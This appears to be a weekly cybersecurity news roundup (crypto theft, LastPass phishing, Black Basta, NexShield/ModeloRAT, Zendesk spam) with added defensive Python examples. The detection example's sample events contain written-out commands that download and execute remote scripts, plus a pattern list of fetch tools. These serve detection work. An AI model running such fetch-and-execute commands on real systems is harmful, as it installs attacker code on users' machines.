Deadly Fraud: $282 Million Heist, Arrests in Cambodia, and New Cybersecurity Threats

We have compiled the most significant cybersecurity news from the past week.

On January 10, 2026, one of the most extensive social engineering attacks was recorded, resulting in the victim losing $282 million worth of Bitcoin and Litecoin. This was highlighted by blockchain investigator ZachXBT.

The user inadvertently gave their seed phrase from a hardware wallet to a scammer posing as a Trezor support staff member. With this access, the hacker withdrew 2,050,000 LTC and 1,459 BTC.

The perpetrator used the decentralized protocol THORChain to convert the assets into Monero, which caused a short-lived spike in the Monero price. Experts from ZeroShadow quickly traced the chain of transactions and managed to freeze approximately $700,000.

On January 20, the creators of the password manager LastPass warned users about a new phishing campaign disguised as maintenance notifications.

Hackers are sending emails urging recipients to back up their password vault within 24 hours. The notification includes a link that supposedly leads to a page for creating an encrypted backup, but clicking the "Create Backup Now" button takes the user to a phishing site.

Through this method, the attackers aim to steal the victims’ master passwords. Experts believe that this malicious campaign began on January 19.
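The campaign described above combines three classic lures: a sender domain that only resembles the brand, a call-to-action link that leaves the brand's domain, and an artificial deadline. The script below is an added example (not from the original article, LastPass, or any vendor) that triages a constructed message for exactly those three signals; the domains `lastpass-maintenance.example` and `vault-backup.example` are invented for the demo.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the campaign described in the article; not a real message.
SAMPLE_EMAIL = {
    "from": "LastPass Support <noreply@lastpass-maintenance.example>",
    "subject": "Scheduled maintenance: back up your vault within 24 hours",
    "html": '<p>Create an encrypted backup before maintenance begins.</p>'
            '<a href="https://vault-backup.example/lastpass/restore">Create Backup Now</a>',
}

# Domains the brand legitimately mails from and links to (assumption for the demo).
BRAND_DOMAINS = {"lastpass.com"}
URGENCY = re.compile(r"\b(within \d+ hours?|urgent(ly)?|immediately)\b", re.I)


class LinkExtractor(HTMLParser):
    """Collect href values of every <a> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def registrable_domain(host):
    # Naive: keep the last two labels. Fine for the demo; real code should consult a public-suffix list.
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def sender_domain(from_header):
    m = re.search(r"@([\w.-]+)", from_header)
    return registrable_domain(m.group(1)) if m else ""


def extract_links(html):
    parser = LinkExtractor()
    parser.feed(html)
    return parser.links


def triage(msg, brand_domains=BRAND_DOMAINS):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    sd = sender_domain(msg["from"])
    if sd not in brand_domains:
        findings.append(f"sender domain {sd!r} is not a brand domain")
    for link in extract_links(msg["html"]):
        host = urlparse(link).hostname or ""
        if registrable_domain(host) not in brand_domains:
            findings.append(f"link {link!r} points outside brand domains")
    if URGENCY.search(msg["subject"]) or URGENCY.search(msg["html"]):
        findings.append("urgency language present")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_EMAIL):
        print("-", line)
```

A real mail gateway would add DMARC/SPF results and a public-suffix list, but the structure stays the same: the link target is checked against where the brand actually lives, not against the text the user sees on the button.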

In the past week, thousands of people, including victims of human trafficking, have left scam centers in Cambodia due to the authorities’ crackdown on crime. This was reported by BBC.

Phnom Penh has launched a new crackdown on scam compounds—large complexes where hundreds of people run schemes that defraud victims worldwide of billions of dollars.

According to experts, many find themselves in such places through deception, while some work there voluntarily.

On January 15, a businessman named Khuong Lee was arrested in Cambodia on suspicion of illegal recruitment and exploitation, fraud, and money laundering. In March 2023, he was featured in a BBC Eye investigation into fraudulent centers in Southeast Asia.

The program showcased a complex in the resort city of Sihanoukville owned by Lee, where individuals were lured from other countries into labor camps and forced to work overnight and engage in scams.

Law enforcement authorities in Germany and Ukraine have identified the leader of the Black Basta ransomware group—a 35-year-old Russian national named Oleg Nefedov. Interpol and Europol have placed the scammer, known online as tramp and kurva, on their most wanted list, as reported by the Cyber Police of Ukraine.

Investigators have established a connection between Nefedov and the now-disbanded Conti syndicate, of which Black Basta is a direct successor following its rebranding in 2022.

During raids in the Ivano-Frankivsk and Lviv regions, two members of the group specializing in hacking secure systems and stealing passwords were apprehended. They provided initial access to networks of major corporations, paving the way for data encryption and subsequent multi-million-dollar ransom demands.

Digital storage devices and significant amounts of cryptocurrency were seized during the searches.

Over its lifetime, Black Basta has attacked more than 700 organizations, including critical infrastructure targets: the German defense contractor Rheinmetall, the European branch of Hyundai, and the UK telecom company BT Group.

The KongTuke group has begun widespread distribution of the malicious NexShield extension for Chrome and Edge. This was reported by cybersecurity researchers from Huntress.

According to experts, the malicious extension masquerades as a lightweight ad blocker. It intentionally overloads memory and processor resources, causing tab freezes and total browser crashes, prompting users to seek system recovery.

After a forced restart, NexShield presents a fake security window offering to scan the system.

Under the guise of resolving the issue, the software instructs users to copy a command into the clipboard and execute it in the Windows command line. In reality, this action launches a script that installs a new remote access Trojan—ModeloRAT.

Experts indicate that the primary target is the corporate sector. The malware waits 60 minutes before activating to avoid suspicion and runs mainly on machines inside organizational domain networks. Once inside, ModeloRAT lets attackers conduct extensive reconnaissance, modify the system registry, install third-party software, and covertly control the victim's computer.

Researchers from Huntress noted that simply removing the extension from the browser will not resolve the issue, as the Trojan is deeply embedded in the system. They advised PC owners to conduct a thorough antivirus scan and never execute commands suggested by websites or extensions.
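The infection chain above hinges on one observable step: an interactive shell launched by the user from the desktop whose command line fetches and runs something from the internet. The script below is an added example (not code from Huntress or the original article) that applies that heuristic to constructed process-creation events shaped like Sysmon Event ID 1 fields (`Image`, `ParentImage`, `CommandLine`); the hostnames and paths in the sample events are invented, and the parent/child/indicator rules are assumptions a detection engineer would tune to their own environment.

```python
import re

# Constructed events with Sysmon ProcessCreate-style fields; not real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c curl -s https://cdn.example/fix.cmd -o %TEMP%\fix.cmd && %TEMP%\fix.cmd"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iex (iwr https://cdn.example/s.ps1)"'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users"},                      # benign interactive use
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Build\build.exe",
     "CommandLine": r'powershell -c "iwr https://cdn.example/s.ps1"'},  # scripted, not user-launched
]

# Interpreters a pasted command would typically run in (assumption).
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
# Parents that indicate a user-initiated launch, e.g. the Run dialog (assumption).
INTERACTIVE_PARENTS = {"explorer.exe"}
# Indicators that the command reaches out to the network or evaluates fetched content.
REMOTE_FETCH = re.compile(
    r"\b(curl|iwr|invoke-webrequest|invoke-expression|iex|mshta|bitsadmin)\b|https?://", re.I)


def basename(path):
    """Return the lowercase file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious(ev):
    """True when a user-launched shell immediately fetches or evaluates remote content."""
    return (basename(ev["Image"]) in SHELLS
            and basename(ev["ParentImage"]) in INTERACTIVE_PARENTS
            and bool(REMOTE_FETCH.search(ev["CommandLine"])))


def flag(events):
    """Return the command lines of all events matching the heuristic."""
    return [ev["CommandLine"] for ev in events if is_suspicious(ev)]


if __name__ == "__main__":
    for cmd in flag(EVENTS):
        print("ALERT:", cmd)
```

The two benign events show why both conditions matter: an interactive `dir` is normal, and a build system invoking `iwr` is normal; the combination of a desktop-launched shell and a remote fetch is what makes the paste-and-run step stand out.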

Users worldwide have become targets of a mysterious spam wave originating from unsecured systems of the cloud support service Zendesk. On January 18, victims reported receiving hundreds of emails.

Apparently, the messages contain no malicious links or overt phishing attempts. However, the volume and chaotic nature of the distribution are worrying recipients.

The emails feature bizarre subjects: some mimic requests from law enforcement agencies or content blocking demands, while others offer free Discord Nitro or contain pleas like "Help me!".

According to BleepingComputer, the emails are generated by support platforms of companies using Zendesk for customer service. The attackers exploited a loophole that allows unauthorized users to send inquiries for automatic responses.

Affected companies include: Discord, Tinder, Riot Games, Dropbox, CD Projekt (2k.com), Maya Mobile, NordVPN, the Tennessee Department of Labor, Lightspeed, CTL, Kahoot, Headspace, and Lime.

Zendesk representatives informed the publication that they have implemented new security features to detect and prevent such spam in the future.
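The loophole described above is a generic one: any help desk that accepts tickets from unauthenticated senders and auto-acknowledges the requester address lets an abuser turn it into a spam relay by submitting tickets with a victim's address. The code below is an added example (not Zendesk's own logic or anything the article describes) of one mitigation: throttling auto-acknowledgments to addresses that have never been verified, while leaving known customers untouched. The limits and the submission stream are constructed for the demo.

```python
from collections import defaultdict, deque


class AutoReplyGate:
    """Decide whether an auto-acknowledgment may go to a requester address.

    Verified addresses (an existing customer, or one that has confirmed an
    opt-in link) are never throttled. Unverified addresses get at most
    `max_per_window` acknowledgments per sliding window; the rest are suppressed.
    """

    def __init__(self, max_per_window=3, window_seconds=3600):
        self.max = max_per_window
        self.window = window_seconds
        self.sent = defaultdict(deque)   # email -> timestamps of sent acks
        self.verified = set()

    def mark_verified(self, email):
        self.verified.add(email.lower())

    def allow(self, email, now):
        email = email.lower()
        if email in self.verified:
            return True
        q = self.sent[email]
        # Drop timestamps that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.max:
            return False          # suppress: the ticket is still created, only the ack is withheld
        q.append(now)
        return True


def simulate(gate, submissions):
    """submissions: iterable of (timestamp, requester_email); returns list of (email, ack_sent)."""
    return [(email, gate.allow(email, ts)) for ts, email in submissions]


# Constructed burst: five tickets in 40 seconds naming the same unverified address,
# one ticket from a verified customer, then one more for the victim after the window expires.
SUBMISSIONS = [
    (0, "victim@example.org"),
    (10, "victim@example.org"),
    (20, "victim@example.org"),
    (30, "victim@example.org"),
    (40, "victim@example.org"),
    (50, "customer@example.com"),
    (3700, "victim@example.org"),
]


def run_demo():
    gate = AutoReplyGate(max_per_window=3, window_seconds=3600)
    gate.mark_verified("customer@example.com")
    return simulate(gate, SUBMISSIONS)


if __name__ == "__main__":
    for email, sent in run_demo():
        print(f"{email:22} ack_sent={sent}")
```

Throttling alone does not stop the first few messages, which is why it pairs well with a confirmation link for never-seen addresses and with per-source-IP limits on ticket creation; the point of the gate is that an abuser can no longer generate hundreds of emails to one inbox from a single unauthenticated endpoint.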